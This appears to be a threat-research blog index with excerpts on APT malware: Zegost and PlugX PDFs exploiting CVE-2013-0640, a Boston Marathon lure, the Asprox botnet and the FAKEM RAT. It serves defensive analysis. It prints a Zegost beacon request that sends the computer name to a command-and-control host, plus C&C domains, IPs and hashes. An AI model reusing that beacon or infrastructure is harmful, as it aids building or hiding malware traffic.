Additional text and analysis by Kyle Wilhoit

Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

Zegost

One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.

Figure 1. Sample decoy document

The PDFs contain embedded JavaScript code that it similar to the code used by the MiniDuke campaign. These similarities include similar function and variable names.

Figure 2. Similar JavaScript code

Analyzing the PDF using Didier Stevens’ PDFiD tool shows that the two PDFs are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/Javascript”, “/OpenAction”, and “/Page”. These fields mean JavaScript is present, automatic actions of some sort take place, and the page number. These three items helped us identify the similarities between MiniDuke and Zegost.

The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks. This has no connection with the MiniDuke malware payload.) The Zegost malware has a distinct beacon:

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache

The command and control server, dns.yimg.ca, resolves to 223.26.55.122 which has been used by the more well known command and control servers like imm.conimes.com and iyy.conimes.com. The email addresses used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com – another known C&C server – and updata-microsoft.com, which is probably also a threat.

PlugX

The second set of malicious PDFs are not necessarily directly related to one another, although they all drop different PlugX variants. The targets of the attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

However, although these attacks also exploit CVE-2013-0640, they are different from the samples discussed above. When comparing the files, one can see the differences, such as the PDF version being used:

Read the rest of this entry »

Using encrypted communication like Secure Sockets Layers (SSL) along with the clever use of recent news item as a social engineering lure is the perfect combination to penetrate and remain in a targeted entity’s infrastructure.

It didn’t take long for targeted attacks to use last week’s Boston Marathon bombing as a bait to trick predetermined users into opening malicious attachments. We found an email with a malicious attachment named The Prayer.DOC, urging recipients to pray for the victims of the tragic event.

Figure 1. Sample email leveraging Boston Marathon incident

The said attachment (MD5: 5863fb691dd5b3002c040fc7c535800f and detected as TROJ_MDROP.ATP) exploits the vulnerability in CVE-2012-0158 to drop the malicious executable file “iExplorer.exe” (MD5: 74a8269dd80d41f7c81e0323719c883c ) onto the target’s computer.

This malware, detected as TROJ_NAIKON.A, connects over SSL (port 443) to the domain name gnorthpoint.eicp.net which previously resolved to 220.165.218.39 but now resolves to 50.117.115.89.

The certificate is filled with spoofed information including the identity “donc” and the organization “abc”.

Figure 2. Screenshot of certificate with spoofed info

Read the rest of this entry »

While spam botnets are well-known for sending out unwanted ads, especially for “rogue” pharmaceutical companies, they are also an integral component of malware distribution. In addition to sending out their own malware so that they can increase the size of their botnet, the miscreants behind these operations also earn revenue by installing additional malware supplied by Pay-Per-Install (PPI) affiliates, or “partnerkas”.

We have examined the operations of the infamous Asprox spam botnet in some detail. Asprox is known for sending spam pretending to be from package delivery companies like FedEx, DHL, and the US Postal Service. While Asprox has only been mentioned sporadically in the past few years, other spam campaigns with similar tactics as well as fake ticket scams using well-known airlines like Delta and American Airlines have received significant attention.

Relatively few of these campaigns were connected to Asprox. Even fewer insights into the full botnet’s operations were reported. How was this possible? Some modifications were made to Asprox that made it much more effective:

• It uses a diverse set of spam templates that uses a variety of themes and languages to lure as users into opening malicious attachments or clicking malicious links.
• It adopted a modular framework (with KULUOZ malware as a dropper) so botnet operators could easily add new features when needed. RC4 encryption was also added to combat network-level detection.
• It has multiple spamming modules, one of which uses compromised legitimate email accounts to combat anti-spam technologies that utilize reputation systems.
• It deploys a scanning module that commands compromised computers to scan websites for various vulnerabilities. This is done so it can distribute malware via compromised websites without being caught by web-filtering and reputation technologies.
• It distributes an information-stealing module that allows it to harvest FTP, website, and email credentials from its victims.

Read the rest of this entry »

The perpetrators of targeted attacks want to maintain a persistent presence in a target network in order to extract sensitive data when needed. To maintain this, attackers seek to blend in with normal network traffic and use ports allowed by firewalls.

Frequently, the malware used in targeted attacks uses HTTP and HTTPS to appear like ordinary web traffic. However, while these malware tools do give attackers full control over a compromised system, they are often simple and configured to carry out few commands.

Some attackers prefer to use remote access Trojans (RATs), sometimes as “second stage” malware, which typically have graphical user interfaces (GUIs) and remote desktop features that include directory browsing, file transfer, the ability to take screenshots, and activate the microphone and web camera of a compromised computer. Publicly available RATs like Gh0st, PoisonIvy, Hupigon, and DRAT, and “closed-released” RATs like MFC Hunter and PlugX are both in common use. However, the network traffic these RATs produce is well-known and easily detectable, although attackers still successfully use them.

To get around this, attackers are always looking for ways to blend their malicious traffic with legitimate traffic to avoid detection. We found a family of RATs that we call “FAKEM” that makes their network traffic look like various protocols. Some variants attempt to disguise network traffic to look like Windows® Messenger and Yahoo!® Messenger traffic. Another variant tries to make the content of its traffic look like ordinary web traffic. The FAKEM RAT appears to have been actively used in attacks since September 2009.

Read the rest of this entry »

Now that knowledge of targeted attacks, including APT activity, has become mainstream within the broader security community, I predict that 2013 will be a year in which our assumptions will be challenged. We have already seen how successful so-called “technically unsophisticated” attacks have been over the last few years, and I predict they will continue to be so as they are designed to exploit the human factor as much as, if not more, than technology.

In his 2013 predictions, our CTO Raimund Genes predicts that there will be increasing sophistication in malware attacks, not necessarily in the technical aspects of the malware itself but in the deployment of an attack. Moreover, he believes that such attacks will increasingly have a destructive capacity and that it will be challenging to determine attribution. Building on these points, I predict the following trends for 2013:

• There will be an increasing specificity in targeted attacks, especially as knowledge of some of the noisier APT campaigns is increasingly publicized. We will see an increase in localized attacks such as malware that will not execute unless certain conditions are met, such as language settings, or “watering hole” attacks that will only affect certain geographic regions or even only specific netblocks.

Read the rest of this entry »